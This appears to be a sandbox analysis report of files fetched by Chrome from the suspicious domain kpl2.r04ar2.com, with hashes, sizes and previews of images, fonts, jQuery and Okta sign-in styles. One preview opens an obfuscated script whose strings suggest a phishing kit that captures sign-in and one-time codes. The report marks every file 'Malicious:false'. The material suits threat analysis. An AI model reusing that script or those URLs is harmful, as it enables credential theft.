                                                          URL:https://kpl2.r04ar2.com/opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 86 x 73, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.014960565232003
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPlxiNR0kxl/k4E08up:6v/lhPuQk7Tp
                                                          MD5:66F395DDE20DA7B6FBA5F1F2D62F9461
                                                          SHA1:AA5C21902D0CF6D5E6B78959094B34931DA2CDC1
                                                          SHA-256:B11A15B13B2E2764881D01331D65E1452369FBE967751495200A8D9669852EC2
                                                          SHA-512:36671550546B7D950114725A26982E944698EDB1015EDD611455C31EA5FFB512AF5EC10D4F664D36BAFD271B6B227E0412972DF219584BE537B6B34D7E3F3948
                                                          Malicious:false
                                                          Preview:.PNG........IHDR...V...I.....(.F.....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):49602
                                                          Entropy (8bit):7.881935507115631
                                                          Encrypted:false
                                                          SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                          MD5:DB783743CD246FF4D77F4A3694285989
                                                          SHA1:B9466716904457641B7831868B47162D8D378D41
                                                          SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                          SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204
                                                          Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):231
                                                          Entropy (8bit):6.725074433303473
                                                          Encrypted:false
                                                          SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                          MD5:547988BAC5584B4608466D761E16F370
                                                          SHA1:C11BB71049702528402A31027F200184910A7E23
                                                          SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                          SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122
                                                          Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10017)
                                                          Category:dropped
                                                          Size (bytes):10245
                                                          Entropy (8bit):5.437589264532084
                                                          Encrypted:false
                                                          SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                          MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                          SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                          SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                          SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                          Malicious:false
                                                          Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):10796
                                                          Entropy (8bit):7.946024875001343
                                                          Encrypted:false
                                                          SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                          MD5:12BDACC832185D0367ECC23FD24C86CE
                                                          SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                          SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                          SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                          Malicious:false
                                                          URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                          Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):3.990210155325004
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                          Malicious:false
                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (51734)
                                                          Category:downloaded
                                                          Size (bytes):222931
                                                          Entropy (8bit):5.0213311632628725
                                                          Encrypted:false
                                                          SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                          MD5:0329C939FCA7C78756B94FBCD95E322B
                                                          SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                          SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                          SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                          Malicious:false
                                                          URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                          Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):93276
                                                          Entropy (8bit):7.997636438159837
                                                          Encrypted:true
                                                          SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                          MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                          SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                          SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                          SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/eflbaMIh8KvYQ56Fw0I2qKmn100
                                                          Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):10796
                                                          Entropy (8bit):7.946024875001343
                                                          Encrypted:false
                                                          SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                          MD5:12BDACC832185D0367ECC23FD24C86CE
                                                          SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                          SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                          SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                          Malicious:false
                                                          Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):43596
                                                          Entropy (8bit):7.9952701440723475
                                                          Encrypted:true
                                                          SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                          MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                          SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                          SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                          SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/90e3UQoFnPZnefHhdNMQPyz73
                                                          Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):35970
                                                          Entropy (8bit):7.989503040923577
                                                          Encrypted:false
                                                          SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                          MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                          SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                          SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                          SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/12Vj5xeItpngol5p78GsRYKIFop50
                                                          Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):1864
                                                          Entropy (8bit):5.222032823730197
                                                          Encrypted:false
                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                          Malicious:false
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65451)
                                                          Category:dropped
                                                          Size (bytes):73876
                                                          Entropy (8bit):5.284713209226513
                                                          Encrypted:false
                                                          SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbcX:AYh8eip3huuf6IidY
                                                          MD5:915D46FD8A4FC4A89138059BD0D054D4
                                                          SHA1:20263099BD772641C53B8358D013FEC0FB3098DC
                                                          SHA-256:A71CBC147456E55A691F9D2861BA4087375510D869047A3B4F885110527E7CA8
                                                          SHA-512:FE3B25B269E2D0AE43D9913A8355F468E1BFB4A6120CF8581E1660CC93C2F2F31F54863151C48F12F650D72EBD7896B64625B41BC2FED33D99165F6C931AE498
                                                          Malicious:false
                                                          Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):70712
                                                          Entropy (8bit):6.94130504124589
                                                          Encrypted:false
                                                          SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                          MD5:F70FF06D19498D80B130EC78176FD3FF
                                                          SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                          SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                          SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                          Malicious:false
                                                          Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):117836
                                                          Entropy (8bit):5.19681176617782
                                                          Encrypted:false
                                                          SSDEEP:3072:VKTS9+zs5jXYjssOlws1jOlwz+FeI7WPyJAQVU7Iw:VMzCjXYjssOlws1jOlwz+FeI70f7Iw
                                                          MD5:336F8E7CD2791AF27D8911E7DECCF318
                                                          SHA1:42BFB03B6043FB5F5868E798881ED74CEE91C83D
                                                          SHA-256:74DDD3E51C84AD6BD46A0BCB98C22278DD3A7C1B5D82D4EE1A47154609485837
                                                          SHA-512:3C56A202DBD191335102BDFC5EB5375885B69B7696A120ABFA319022A16473B351CF8D834BF43E76407BEF43CA697EF1EA39D49DB82A9AFAC3E8AF3BEBA5C15C
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109
                                                          Preview:const _0x1770e6=_0x4d4e;(function(_0x4d4b96,_0x4dadad){const _0x3ae15a=_0x4d4e,_0x399160=_0x4d4b96();while(!![]){try{const _0x2ea7aa=-parseInt(_0x3ae15a(0x147))/0x1+parseInt(_0x3ae15a(0x1dc))/0x2+-parseInt(_0x3ae15a(0x12a))/0x3+parseInt(_0x3ae15a(0x92))/0x4*(-parseInt(_0x3ae15a(0x22a))/0x5)+parseInt(_0x3ae15a(0x175))/0x6+parseInt(_0x3ae15a(0x23a))/0x7+-parseInt(_0x3ae15a(0x1dd))/0x8*(-parseInt(_0x3ae15a(0x18b))/0x9);if(_0x2ea7aa===_0x4dadad)break;else _0x399160['push'](_0x399160['shift']());}catch(_0x5bc737){_0x399160['push'](_0x399160['shift']());}}}(_0x3b53,0xc4df2));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;function _0x3b53(){const _0xc07c05=['#btn_next','largeIcon','logo','data-id','script','animation','unset','#btn_back','display','appendChild','otpdesc','valid\x20email\x20otp','methodid','error_2fa','iAdditionalProofInfo','PhoneAppOTP_Live','body','style','placeholder','W
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):2905
                                                          Entropy (8bit):3.962263100945339
                                                          Encrypted:false
                                                          SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                          MD5:FE87496CC7A44412F7893A72099C120A
                                                          SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                          SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                          SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173
